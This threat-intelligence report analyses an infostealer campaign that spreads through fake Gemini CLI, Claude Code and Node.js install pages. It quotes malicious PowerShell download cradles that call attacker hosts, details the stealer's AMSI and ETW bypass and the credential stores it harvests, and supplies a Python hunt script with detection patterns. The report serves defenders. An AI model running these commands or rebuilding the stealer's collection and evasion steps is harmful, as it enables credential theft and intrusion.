Executive summary
- Financially motivated eCrime actors will likely continue to expand opportunistic campaigns by impersonating AI platforms. These campaigns generate direct supply chain risk for enterprises, as threat actors target software developer tooling, including AI coding assistants and package managers, to compromise developer workstations.
- In early March 2026, EclecticIQ analysts identified an ongoing infostealer campaign targeting Gemini CLI and Claude Code users. Threat actors use SEO poisoning to surface fake domains above legitimate results, directing victims to attacker-controlled infrastructure that mimics genuine AI agent installation pages.
- The infostealer targets Windows endpoints and executes entirely in memory through PowerShell, harvesting credentials and sensitive data from a wide range of applications before exfiltrating the results in encrypted form to a command-and-control server.
- Beyond credential theft, the malware provides arbitrary remote code execution capability, which financially motivated operators leverage to transition into hands-on-keyboard intrusions against selected victims and execute interactive code within the compromised environment.
- Installations from these impersonated websites result in exfiltration of OAuth tokens, CI/CD credentials, corporate VPN details, and sensitive files, giving adversaries a direct path to initial access into the wider enterprise network.
- This campaign shows that financially motivated threat actors are capitalizing on widespread enterprise adoption of AI platforms to deliver infostealer malware.
- Despite sustained law enforcement action, including Operation Magnus against RedLine and META in October 2024 and the May 2025 disruption of LummaC2 infrastructure, infostealer deployment against enterprise targets will likely continue to grow in the near term. Low operating costs and persistent demand for stolen credentials in underground markets sustain this trajectory.
Typosquatted domains impersonate Gemini and Claude Code installation
The Gemini CLI impersonation campaign was first publicly identified by independent threat researcher @g0njxa [1], whose initial discovery enabled the analysis and infrastructure pivoting documented in this report. The infection chain begins with a Google search by a developer looking for the official Gemini CLI [2] or Claude Code [3] installation page. Threat actors use SEO poisoning to surface a fake domain at the top of search results, above the legitimate source. The victim clicks through, lands on a malicious page visually consistent with a genuine vendor installation guide, and is prompted to execute a single command to complete the install.

Figure 1 - Impersonation of Gemini CLI installation page.
In the Gemini CLI impersonation campaign, victims were directed to the fake installation page geminicli[.]co[.]com, which displays what appears to be a legitimate installation instruction. The page prompts the user to copy and paste a PowerShell command into their terminal; when executed, the command reaches out to gemini-setup[.]com to download the infostealer downloader payload (Install.ps1).

Figure 2 - Malicious instruction used to deliver infostealer downloader.
Once the download completes, the infostealer establishes a connection to its command-and-control server at events[.]msft23[.]com, infrastructure used to receive exfiltrated data from compromised hosts.

Figure 3 - C2 communication after the execution of the infostealer.
The same threat actor also, almost certainly, targeted users of Anthropic's Claude Code. This assessment is based on the use of the same malware family, the structure of the command-and-control server and consistency in the social engineering lure.
On March 30, 2026, the threat actor registered two additional domains for Claude Code impersonation, claudecode[.]co[.]com and claude-setup[.]com, both following the identical naming patterns: the co[.]com suffix and the -setup[.]com convention. The threat actor chose these domain names to appear legitimate to victims. The malicious domain claudecode[.]co[.]com hosted a cloned installation page visually consistent with Anthropic's official documentation and presented the user with a PowerShell command to "install" the tool, while claude-setup[.]com hosted the final payload that was downloaded.

Figure 4 - Similarities of domain names between two AI platform impersonation campaigns.
After execution, the infostealer malware sends exfiltrated data to events[.]ms709[.]com, which serves as the C2 server for the Claude Code impersonation campaign. The attack chain mirrors behavior observed in the Gemini impersonation campaign, including the use of identical themed domain conventions to stage and deliver payloads. This behavioral overlap increases analyst confidence in the assessment that the same threat actor is responsible for both campaigns.
Weaponizing legitimate AI tooling installations to hide a fileless PowerShell infostealer
Malware analysis reveals the infection chain begins with a short first-stage PowerShell script embedded in the fake installation page, which performs two simultaneous actions rather than executing the payload directly:

Figure 5 - Downloader PowerShell script.
- Silent payload retrieval: The script instantiates a Shell.Application COM object and calls ShellExecute with window style 0 (hidden) to spawn a concealed PowerShell window. This hidden process executes the command irm events[.]msft23[.]com | iex, which downloads the second-stage infostealer payload directly into memory via Invoke-RestMethod and passes it to Invoke-Expression for immediate execution without writing to disk.
- Legitimate Gemini installation: In parallel, the same script runs the command npm install -g @google/gemini-cli, installing the genuine Gemini CLI package from Google's official npm registry. The victim sees a real installation complete successfully in their terminal: dependency resolution, progress bars, and a working CLI binary at the end.
The real CLI installation completes while the stealer runs in parallel, so the process appears genuine to the user. By the time the npm install finishes and the user begins working with the tool, the infostealer has already completed its data collection and exfiltration cycle.
Once the second-stage PowerShell payload is executed, it immediately moves to neutralize Microsoft Windows endpoint visibility by disabling two core defensive mechanisms:

Figure 6 - Final PowerShell infostealer disabling ETW.
- Event Tracing for Windows (ETW): The script patches the PSEtwLogProvider.m_enabled flag, suppressing PowerShell-specific ETW telemetry and preventing both local logging and forwarded event collection from capturing execution details.
- Antimalware Scan Interface (AMSI): The bypass renders in-process script scanning inoperative, allowing subsequent obfuscated content to execute without triggering signature-based or heuristic detections.
After Microsoft Defender's telemetry collection is neutralized, the script operates in an effectively unmonitored environment. The malicious PowerShell script performs all of the collection, staging and exfiltration natively. It is heavily obfuscated with approximately 6,800 lines of junk code branches and includes a qemu-ga string check as a basic anti-sandbox gate designed to detect virtualized environments before proceeding.
To interact with the operating system at a level beyond what PowerShell cmdlets expose, the script loads three embedded C# types at runtime via Add-Type, each targeting a different aspect of host interrogation:
- CredHelper: P/Invokes advapi32.dll to call CredEnumerate [4] against Windows Credential Manager, extracting stored credentials for web services, RDP sessions, and enterprise applications.
- User32: Calls EnumDisplaySettings to capture screen resolution, a common fingerprinting technique used to profile the victim environment and identify virtual machines.
- Rstrtmgr: Leverages the Restart Manager API through rstrtmgr.dll to enumerate running processes without calling the heavily monitored Get-Process cmdlet, providing the operator with an immediate view of active security tooling and productivity applications on the host.
The stealer's collection scope reveals a deliberate focus on enterprise users and developer workstations. It iterates across all detected browser profiles, invoking dedicated routines for Chromium-family browsers (Chrome, Edge, and Brave) and a separate handler for Firefox, extracting login credentials, session cookies, autofill data, and form history. Beyond browsers, the script directly targets collaboration and communication platforms that are standard in corporate environments:
- Slack: Local State key extraction and Network cookies
- Microsoft Teams: EBWebView cache cookies under LocalAppData, with DPAPI-protected Local State decryption
- Discord: Local Storage LevelDB files and Local State
- Mattermost: Session cookies and Local State
- Zoom: DPAPI-protected win_osencrypt_key extracted from Zoom.us.ini
- Telegram Desktop: tdata session directory
- LiveChat, Notion, Zoho Mail Desktop: Session cookies and partitioned storage data
For an attacker, a valid session cookie or Local State key from any of these platforms grants authenticated access to the victim's workspace, including internal channels, shared files, client communications, and connected integrations. This access bypasses password and MFA requirements entirely, making stolen session material a high-value commodity for immediate resale in underground markets. This is the data that feeds the access broker market and enables account takeover at scale.
Collection extends further into access tokens, cloud storage and sensitive user files. The script targets:
- Remote access tools: WinSCP stored passwords from the registry (HKCU:\SOFTWARE\Martin Prikryl\WinSCP 2\), PuTTY saved sessions (HKCU:\Software\SimonTatham\PuTTY\Sessions), and OpenVPN configuration files including embedded key material and DPAPI-protected login data.
- Cryptocurrency wallets: Brave Wallet preferences and Spectre wallet data.
- Cloud storage: Enumeration of locally synced directories for Proton Drive, iCloud Drive, Google Drive, MEGA, and OneDrive.
- User files and system metadata: Recursive listing of .txt and .docx files across Desktop, Documents, and Downloads; desktop wallpaper capture via TranscodedWallpaper; OS version, installed software, network adapter configuration, and running process inventory.
Exfiltration of everything from SSH keys and VPN configurations to cloud-synced documents ensures that even a single compromised workstation yields credentials, session tokens, and files spanning both personal and corporate contexts. A full breakdown of all targeted software and data types is provided in Table 1, Software and Data Targeted by the Infostealer.
The infostealer sample also includes a command-and-control feature that allows the operator to run arbitrary follow-on payloads on infected hosts. No persistence mechanism was found in the PowerShell script.

Figure 7 – De-obfuscated C2 server and staging URL paths embedded in the PowerShell script.
The infostealer communicates with events.msft23[.]com over three URL endpoints:
- /take is used to request initial configuration or staging data from the server.
- /process is the main beacon endpoint that both uploads exfiltrated host data and returns the operator's task list in the same HTTP response.
- /validate is used to confirm task execution or report status back to the operator.
The task dispatch flow works as follows:
- After exfiltrating data to events.msft23[.]com/process, the same request returns an RSA-encrypted task list in the response.
- The implant decrypts it, splits it into records, and matches each record's target ID against the local victim ID (derived from MachineGuid).
- On a match, it runs the operator-supplied URL via powershell.exe -command IEX(Invoke-WebRequest -UseBasicParsing '<url>') through Shell.Application.ShellExecute.
- A secondary path uses named pipes to run arbitrary PowerShell in a child process and capture its output back to the parent.
Mapping the wider campaign through passive DNS pivots from a single bulletproof host
EclecticIQ analysts used passive DNS records and pivoted from the claude-code.co[.]com domain, which is hosted at 109.107.170[.]111, an IP address assigned to the Netherlands-based bulletproof hosting provider MIRhosting [5]. This pivot revealed a larger cluster of malicious infrastructure with more than 30 domains, exposing a highly likely coordinated campaign also designed to impersonate the Node.js and Chocolatey package managers, the open-source password manager KeePassXC, the cryptocurrency Monero and other developer productivity tooling.

Figure 8 - Pivoted domains from AI impersonation campaign.
This impersonation campaign is likely geographically tailored to mostly target users in the United States and United Kingdom, as evidenced by the selection of .co.uk, .us.com and .us.org top-level domains in some of the attacker-controlled domains.
The inclusion of Monero lures indicates a multi-faceted objective, combining crypto theft with the compromise of developer environments. The rapid registration of these domains between late March and early April 2026 suggests that the campaign is highly likely still active.
One example from this pivoted cluster is nodejs-setup.co[.]com, a domain impersonating the official Node.js installation page. Rather than delivering a legitimate Node.js installer, the page instructs the visitor to execute the following PowerShell command:
- "powershell.exe" -c "irm https://community.chocolatey[.]net/install.ps1|iex"

Figure 9 - Impersonation of Node.js package manager.
The lure, a fake Node.js installation page, deliberately invokes Chocolatey as the installation method. This is a calculated choice, as legitimate Node.js installation instructions genuinely support Chocolatey-based setup. The one-liner PowerShell command references community.chocolatey[.]net, a domain impersonating Chocolatey's official infrastructure, stacking two spoofed domains into a single social-engineering flow that closely mirrors authentic developer workflows.
The technique is tailored to the habits of developers and IT administrators, who routinely paste one-line PowerShell installers from package manager websites without close inspection. The execution chain ultimately delivers the same fileless PowerShell infostealer documented earlier in this report, with the only meaningful change being a rotation of the command-and-control endpoint from events.msft23[.]com to events.ms709[.]com.
Both C2 domains follow the same structural pattern: an "events." subdomain paired with a short, brand-adjacent root that loosely evokes Microsoft. This indicates that the operator is reusing a single tooling and infrastructure template, rotating only the lure brand and C2 hostname while keeping the underlying implant and naming logic intact.
Across this campaign, the threat actor shows an understanding of developer behavior and exploits the current hype around AI coding platforms. These attack patterns highly likely target developers and IT administrators. By impersonating brands embedded in routine developer workflows, including Node.js, Chocolatey, and KeePassXC, the actor weaponized familiar installation patterns to deliver infostealer malware. This approach targets trust in developer tooling, turning routine software adoption into an initial access vector.
This targeting approach will very likely persist and expand over the coming months, as developers typically hold elevated privileges across enterprise networks, source code repositories, and software supply chains. Financially motivated eCrime actors will highly likely continue prioritizing developer-focused campaigns, as a single compromised developer endpoint can yield disproportionate access and enable high-impact intrusions against the wider enterprise environment.
Detection and prevention opportunities
Detection opportunities
- Hunt for the irm | iex download cradle pattern in command-line telemetry. Process command lines containing Invoke-RestMethod, Invoke-Expression, or the aliases irm and iex chained together are a high-fidelity indicator of fileless execution.
- Alert on powershell.exe spawned with -WindowStyle Hidden or instantiated through Shell.Application.ShellExecute with window style 0. This is the concealed execution pattern used in the first-stage script.
- Hunt for Add-Type followed by P/Invoke calls to advapi32.dll!CredEnumerate from a PowerShell session. This is the credential-manager dumping behavior of the stealer.
- Block or alert on traffic to .co.com second-level domains, particularly when the FQDN mirrors a developer brand (e.g., *-setup.com, *-cli.co.com, nodejs-*, claude-*, gemini-*).
- Detect the C2 beacon pattern: HTTP requests to URI paths /take, /process, /validate with PowerShell user-agent strings.
- Correlate powershell.exe spawning from explorer.exe or cmd.exe with outbound HTTP/HTTPS connections within five seconds. This catches paste-and-execute initial access.
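As an added example (not EclecticIQ's detection content or the malware's code), the detection opportunities above expressed as hunt rules and run over constructed sample telemetry; the event schema (type/ts/pid/image/parent/cmdline/text/dst/path/ua) is an assumption standing in for EDR or Sysmon fields.

```python
"""Hunt rules for the fileless PowerShell infostealer described above, run over constructed
sample telemetry. Added example; the event schema (type/ts/pid/image/parent/cmdline/text/dst/path/ua) is an assumption."""
import re
from datetime import datetime, timedelta

# irm/Invoke-RestMethod (or iwr/Invoke-WebRequest) piped into iex/Invoke-Expression,
# plus the operator task form IEX(Invoke-WebRequest ...) from the C2 dispatch flow.
CRADLE_RE = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b[^|]*\|\s*(?:iex|invoke-expression)\b"
    r"|\b(?:iex|invoke-expression)\s*\(\s*(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b",
    re.IGNORECASE)
# -WindowStyle Hidden; PowerShell accepts abbreviated parameter names, so "-w hidden" counts too.
HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden\b", re.IGNORECASE)
CREDMAN_TOKENS = ("add-type", "advapi32.dll", "credenumerate")  # P/Invoke Credential Manager dump
SHELLEXEC_TOKENS = ("shell.application", "shellexecute")  # concealed window via COM (Figure 5)
C2_PATHS = {"/take", "/process", "/validate"}
LURE_PREFIXES = ("nodejs-", "claude-", "gemini-")

def is_download_cradle(cmdline):
    return bool(CRADLE_RE.search(cmdline))

def is_hidden_powershell(cmdline):
    return "powershell" in cmdline.lower() and bool(HIDDEN_RE.search(cmdline))

def has_tokens(script_text, tokens):
    t = script_text.lower()  # script block logging text, case-folded
    return all(tok in t for tok in tokens)

def is_c2_beacon(path, user_agent):
    return path.split("?")[0].lower() in C2_PATHS and "powershell" in user_agent.lower()

def is_lure_domain(fqdn):
    """Brand-mimicking .co.com / *-setup.com hosts and nodejs-/claude-/gemini- labels."""
    f = fqdn.lower().replace("[.]", ".").rstrip(".")  # refang defanged indicators first
    return (f.endswith(".co.com") or f.endswith("-setup.com")
            or any(label.startswith(LURE_PREFIXES) for label in f.split(".")))

def paste_and_execute(events, window=timedelta(seconds=5)):
    """PIDs of powershell.exe spawned by explorer.exe/cmd.exe that talk out within `window`."""
    spawns = {e["pid"]: e["ts"] for e in events if e["type"] == "process"
              and e["image"].lower().endswith("powershell.exe")
              and e["parent"].lower() in ("explorer.exe", "cmd.exe")}
    return sorted({e["pid"] for e in events if e["type"] == "network" and e["pid"] in spawns
                   and timedelta(0) <= e["ts"] - spawns[e["pid"]] <= window})

def run_hunt(events):
    """Return sorted (rule, detail) pairs for every rule that fires on the event stream."""
    findings = set()
    for e in events:
        if e["type"] == "process":
            if is_download_cradle(e["cmdline"]):
                findings.add(("download_cradle", e["pid"]))
            if is_hidden_powershell(e["cmdline"]):
                findings.add(("hidden_window", e["pid"]))
        elif e["type"] == "scriptblock":
            if has_tokens(e["text"], SHELLEXEC_TOKENS):
                findings.add(("hidden_shellexecute", e["pid"]))
            if has_tokens(e["text"], CREDMAN_TOKENS):
                findings.add(("credman_dump", e["pid"]))
        elif e["type"] == "network":
            if is_lure_domain(e["dst"]):
                findings.add(("lure_domain", e["dst"]))
            if is_c2_beacon(e["path"], e["ua"]):
                findings.add(("c2_beacon", e["dst"] + e["path"]))
    findings.update(("paste_and_execute", pid) for pid in paste_and_execute(events))
    return sorted(findings)

T0 = datetime(2026, 3, 5, 9, 12, 0)
SAMPLE_EVENTS = [  # constructed, modelled on the chain in Figures 5 to 7 and the C2 endpoints
    {"type": "process", "ts": T0, "pid": 4120, "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": 'powershell.exe -w hidden -c "irm events.msft23[.]com | iex"'},
    {"type": "scriptblock", "ts": T0 + timedelta(seconds=1), "pid": 4120,
     "text": "New-Object -ComObject Shell.Application ... .ShellExecute(...)\n"
             'Add-Type -TypeDefinition \'[DllImport("advapi32.dll")] ... CredEnumerate\''},
    {"type": "network", "ts": T0 + timedelta(seconds=2), "pid": 4120,
     "dst": "gemini-setup[.]com", "path": "/Install.ps1", "ua": "WindowsPowerShell/5.1"},
    {"type": "network", "ts": T0 + timedelta(seconds=4), "pid": 4120, "dst": "events.msft23[.]com",
     "path": "/process", "ua": "Mozilla/5.0 (Windows NT 10.0) WindowsPowerShell/5.1.19041"},
    # the genuine npm install running alongside: no cradle, no hidden flag, no outbound event
    {"type": "process", "ts": T0 + timedelta(seconds=3), "pid": 4188, "image": "powershell.exe",
     "parent": "explorer.exe", "cmdline": 'powershell.exe -c "npm install -g @google/gemini-cli"'},
]
```

Calling run_hunt(SAMPLE_EVENTS) fires every rule on the malicious process 4120 and nothing on the benign npm install, which is the behaviour a tuned hunt should show.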
Prevention opportunities
- Enforce PowerShell Constrained Language Mode (CLM) on standard developer workstations via WDAC or AppLocker. This blocks Add-Type, reflection, and most P/Invoke-based credential theft used by the stealer.
- Use FIDO keys to minimize identity-based attack chains targeting highly privileged user accounts.
- Deploy AppLocker or WDAC rules that prevent powershell.exe from executing scripts downloaded from the internet (Mark-of-the-Web enforcement).
- Configure browser policies to disable clipboard write access for untrusted sites where feasible, mitigating ClickFix-style paste-and-execute lures.
- Enforce short-lived OAuth tokens with mandatory refresh and conditional access on developer-tier accounts to limit replay value of stolen session cookies.
- Raise user awareness with developer-specific guidance about this social engineering campaign.
IOCs
Attacker-controlled domains:
SHA-256 file hashes:
Table 1 - Software and Data Targeted by the Infostealer

| Category | Targeted Software / Data | Collection Method |
| --- | --- | --- |
| Chromium Browsers | Google Chrome, Microsoft Edge, Brave | Login Data, Cookies, Web Data, autofill, form history per user profile |
| Firefox Browsers | Mozilla Firefox | cookies.sqlite, formhistory.sqlite, logins.json, sessionstore.jsonlz4 per profile |
| Collaboration — Messaging | Slack | Local State key extraction, Network cookies |
| Collaboration — Messaging | Microsoft Teams | EBWebView Local State + per-partition Network cookies (DPAPI-protected) |
| Collaboration — Messaging | Discord | Local Storage LevelDB files + Local State |
| Collaboration — Messaging | Mattermost | Cookies + Local State |
| Collaboration — Messaging | Telegram Desktop | tdata session directory from Desktop, Documents, and Downloads |
| Collaboration — Video | Zoom | DPAPI-protected win_osencrypt_key from Zoom.us.ini |
| Collaboration — Support | LiveChat | Session cookies |
| Productivity | Notion | Partitioned Network cookies |
| Productivity | Zoho Mail Desktop | Per-partition cookies + Local State |
| Productivity | Evernote | Local storage files |
| Remote Access | WinSCP | Stored session passwords from registry (HKCU:\SOFTWARE\Martin Prikryl\WinSCP 2\) |
| Remote Access | PuTTY | Saved session configurations from registry (HKCU:\Software\SimonTatham\PuTTY\Sessions) |
| VPN | OpenVPN | Config files with embedded key material + DPAPI-protected GUI login data |
| Cryptocurrency | Brave Wallet | Wallet preferences and data |
| Cryptocurrency | Spectre | Wallet files |
| Cloud Storage | Proton Drive, iCloud Drive, Google Drive, MEGA, OneDrive | Enumeration of locally synced file directories |
| Gaming | Steam | Installation path data and configuration files |
| Windows Credentials | Credential Manager | CredEnumerate via P/Invoke (advapi32.dll) — all stored credentials including RDP, web, and enterprise app entries |
| User Files | Desktop, Documents, Downloads | Recursive enumeration of .txt and .docx files |
| System Reconnaissance | OS, software, display, network, processes, wallpaper | EnumDisplaySettings, Restart Manager API, WMI queries, TranscodedWallpaper capture |
MITRE ATT&CK mapping

| Tactic | Technique ID | Technique | Observed Behavior |
| --- | --- | --- | --- |
| Initial Access | T1189 | Drive-by Compromise | Victims directed to attacker-controlled sites via SEO-poisoned search results |
| Initial Access | T1608.006 | Stage Capabilities: SEO Poisoning | Malicious domains promoted above legitimate vendor sites in Google results |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | First- and second-stage payloads executed in memory via PowerShell |
| Execution | T1204.001 | User Execution: Malicious Link | User clicks SEO-poisoned search result |
| Execution | T1204.002 | User Execution: Malicious File | User pastes one-liner PowerShell command into terminal (irm \| iex pattern) |
| Defense Evasion | T1027 | Obfuscated Files or Information | Approximately 6,800 lines of junk code branches in second-stage script |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | RSA-encrypted task list decrypted at runtime |
| Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | AMSI bypass via in-memory patching of amsi.dll |
| Defense Evasion | T1562.006 | Impair Defenses: Indicator Blocking | ETW disabled by patching PSEtwLogProvider.m_enabled flag |
| Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks | qemu-ga string check as anti-sandbox gate |
| Defense Evasion | T1218 | System Binary Proxy Execution | Shell.Application.ShellExecute used to launch hidden PowerShell window |
| Discovery | T1057 | Process Discovery | Restart Manager API used to enumerate processes (avoids Get-Process cmdlet) |
| Discovery | T1083 | File and Directory Discovery | Recursive enumeration of .txt and .docx files in user directories |
| Credential Access | T1555.003 | Credentials from Web Browsers | Chrome, Edge, Brave, Firefox login data, cookies, autofill extracted |
| Credential Access | T1555.004 | Credentials from Windows Credential Manager | CredEnumerate via advapi32.dll P/Invoke |
| Credential Access | T1539 | Steal Web Session Cookie | Slack, Teams, Discord, Mattermost session cookies harvested |
| Credential Access | T1552.001 | Unsecured Credentials: Credentials In Files | OpenVPN configs, embedded key material, Zoom encryption keys |
| Credential Access | T1552.002 | Unsecured Credentials: Credentials in Registry | PuTTY and WinSCP saved sessions extracted from HKCU registry hives |
| Collection | T1005 | Data from Local System | Cloud-synced directories (Proton Drive, iCloud, Google Drive, OneDrive) enumerated |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | HTTPS C2 to events.msft23[.]com and events.ms709[.]com (/take, /process, /validate) |
| Command and Control | T1573 | Encrypted Channel | RSA-encrypted task list returned in C2 response |
| Command and Control | T1105 | Ingress Tool Transfer | Operator-supplied URLs fetched and executed via IEX(Invoke-WebRequest) |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | Stolen credentials and files exfiltrated to /process endpoint in encrypted form |
References
[1] Who said what? [@g0njxa], “Related Windows malware campaign new deployments impersonating Google’s Gemini CLI tool 🤖👾 Detonation: https://t.co/n8h0LUViks geminicli[.]co[.]com >> gemini-setup[.]com Prompting user to execute a malicious Powershell script hosted at the fake gemini website https://t.co/AmqIQm4VOS,” Twitter. Accessed: Apr. 28, 2026. [Online]. Available: https://x.com/g0njxa/status/2046605636494885329
[2] “Build, debug & deploy with AI,” Gemini CLI. Accessed: Apr. 28, 2026. [Online]. Available: https://geminicli.com/
[3] “Claude Code | Anthropic’s agentic coding system.” Accessed: Apr. 28, 2026. [Online]. Available: https://www.anthropic.com/product/claude-code
[4] “pinvoke.net: credwrite (advapi32).” Accessed: Apr. 28, 2026. [Online]. Available: https://www.pinvoke.net/default.aspx/advapi32.credwrite
[5] “Bulletproof Host Stark Industries Evades EU Sanctions – Krebs on Security.” Accessed: Apr. 28, 2026. [Online]. Available: https://krebsonsecurity.com/2025/09/bulletproof-host-stark-industries-evades-eu-sanctions/